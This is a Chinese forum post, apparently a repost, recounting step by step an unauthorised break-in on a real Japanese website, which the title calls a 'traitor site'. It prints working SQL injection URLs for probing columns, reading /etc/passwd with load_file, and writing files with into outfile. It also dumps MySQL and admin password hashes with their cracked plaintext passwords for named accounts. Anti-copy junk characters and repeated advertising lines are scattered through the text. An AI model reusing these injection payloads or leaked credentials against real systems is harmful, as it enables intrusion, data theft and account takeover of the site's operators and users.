原创 检测汉奸站全过程

xiancda

补：www.zuaa.jp测试

+ G5 @% e! O! W1 j/ _3 f0x01. 检测 www.zuaa.jp 收集数据
+ P0 j1 Z0 U! j0 F0 O

whatweb


4 |" \% {- _& F' w3 ?; @利用NMAP扫描
9 j0 v- i( l% P" l# W
0 ]  I7 k7 C' u1 g# }中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
1 E4 X& }& c& i; {9 T% O0x02.找注入点
. Q' P9 g0 R) V0 `5 w9 h2 C找注入点：http://www.zuaa.jp/php/newsdetail.php?topic_id=390
& }2 s, N1 d# p$ i

; B$ l5 @6 t1 k" N4 t0x03.order by
& V' P9 c+ b; l! Z: K  E( R( M             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1

order by 28报错，order by 27正常
9 V$ q6 p' |8 }! f
0x04.   union手动查询
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
) L  W$ T+ n  z" ~: i9 L添加到 27 时正常显示
6 }( m$ ^% F  q$ u
. b8 I4 @& U1 I' k4 `中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

+ g+ T9 Y1 l0 u$ \, \7 F7 g5 B0x05. info:
% E6 F  d4 Z, u* O' uhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27

5 f+ ^6 B9 h# p! o. _$ g2 Tuser:            root@localhost
database:    openpne
* e6 W& U5 v. k8 jversion:      4.1.22
+ J5 @. O6 M+ j3 x8 u9 H) {0 Sos:             portbld-freebsd5.4
- q5 ?$ C* @% K3 U- M8 V0 P
0x06. root用户
9 n' J: i* x6 ]$ p% w利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的（这种方法， 可以过大多数站）
9 ^; V8 X) ?8 ^$ h/ N- Bhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27

, W3 B8 J% B2 R% s& }通过工具转换

中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

/ T4 P: J% T% T. C% d5 k0x07. 利用 into outfile
全部都失败
: M) z8 y4 a& J' jhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php

- @, A5 }1 P% h& k5 Ghttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php
) b: l0 q7 P* w) @- G2 g
页面显示“MDB2 Error:syntax error”
2 j8 Z, _! D0 `
, X( f3 }7 i* B( k/ |. h0x08. 利用 mysql 4.1
  j7 ^1 [3 E; ~6 |( `& @  A0 J猜常规表名，字段未果 工具 sqlmap
; S: M7 b; w0 a% U7 ^/ Q中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
# S8 S( @. b- G0 o( D
4 o6 S2 \4 @: G' \
9 y* H/ M2 q) u, y" Z$ Z* x
0x09. 查找后台
利用 现有的各种 后台工具尝试都不行

6 s6 E3 ?- H$ O: i8 u2 U3 m: }% _0x10.  MySL外联方法
从前面 nmap 收集的信息当中，可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码，然后再通过 mysql 工具外连 www.zuaa.jp 不行
可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
( n' E, f0 j. m/ v7 n+ Khttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user

这个可以在 www.cmd5.com 解密
$ V% C' {9 t- [# [  \root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
工具外连失败，据说防火墙策略只允许特定IP外连，具体不得知


0x11. 网站突破
发现网站的源程序 openpne, google 下载 openpne 源码

  O$ ]4 T$ \2 V" e
% u( X- o; d3 i, ~$ i  H$ L0x12. 默认信息利用
7 l' n2 D* C% w" L$ Rhttp://sns.zuaa.jp/?m=admin&a=page_login

表名 (c_admin_user) ，字段名（username,password）
# _( Q, S4 o5 ~1 _$ ?7 Hhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
1 L3 v( j# M3 K# ]7 Q
解密
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
zuaajp:c0923ec5857796a393da99905008c176,          zju1897

1 @8 \8 s% f8 O, q. X中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
- }4 a" D/ P' W% V1 {! e
0x13. 登录后台
( i3 O. f* N% w8 O: F( g


! X/ L1 V5 o- M% f1 X7 L, n- i  o0x14. 小结
利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 。
感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
: _4 c- V0 f3 I------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
0 ?$ Y% \- j% U中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
# g$ N" z7 w$ ], o4 x# I% `: }5 W
最后声明：本人只负责了整理上传到论坛，让大家学习，不是原作者，原作者辛苦了！

荒村狂客

哪个牛人 费的这劲 入侵的